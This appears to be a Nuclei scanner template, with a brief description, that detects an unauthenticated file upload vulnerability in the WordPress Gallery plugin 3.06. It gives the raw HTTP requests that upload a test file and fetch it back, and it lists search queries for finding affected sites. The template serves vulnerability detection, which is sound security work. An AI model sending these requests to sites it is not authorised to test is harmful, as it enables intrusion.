Description
The Gallery by BestWebSoft WordPress plugin was affected by an Unauthenticated File Upload PHP Code Execution security vulnerability.
The Gallery by BestWebSoft WordPress plugin was affected by an Unauthenticated File Upload PHP Code Execution security vulnerability.
id: wp-gallery-file-upload
info:
name: WordPress Plugin Gallery 3.06 - Arbitrary File Upload
author: r3Y3r53
severity: high
description: |
The Gallery by BestWebSoft WordPress plugin was affected by an Unauthenticated File Upload PHP Code Execution security vulnerability.
remediation: Fixed in version 3.1.1
reference:
- https://www.exploit-db.com/exploits/18998
- http://wordpress.org/extend/plugins/gallery-plugin/
- http://downloads.wordpress.org/plugin/gallery-plugin.3.06.zip
- https://wpscan.com/vulnerability/049c8518-1f52-4aa4-b0b3-218289727353
classification:
cpe: cpe:2.3:a:bestwebsoft:gallery:*:*:*:*:wordpress:*:*:*
metadata:
verified: true
max-request: 2
publicwww-query: /wp-content/plugins/gallery-plugin/
google-query: inurl:/wp-content/plugins/gallery-plugin/
product: gallery
vendor: bestwebsoft
tags: wp,wp-plugin,wordpress,wpscan,file-upload,intrusive,vuln
variables:
filename: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
POST /wp-content/plugins/gallery-plugin/upload/php.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=WebKitFormBoundary20kgW2hEKYaeF5iP
--WebKitFormBoundary20kgW2hEKYaeF5iP
Content-Disposition: form-data; name="qqfile"; filename="{{filename}}.png"
{{randstr}}
--WebKitFormBoundary20kgW2hEKYaeF5iP--
- |
GET /wp-content/plugins/gallery-plugin/upload/files/{{filename}}.png HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(content_type_1, "text/html") && contains(content_type_2, "image/png")'
- 'contains(body_1, "success:true") && contains(body_2, "{{randstr}}")'
condition: and
# digest: 4a0a00473045022100bd1288d3f1700e560012b1bb8d3f3277916dd660a03e25695ac84c799ba82d7a022053529a063a8104e6e803dc5e17ff9e0e682f48564c63b3cc98422b4a6ff5e1ff:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.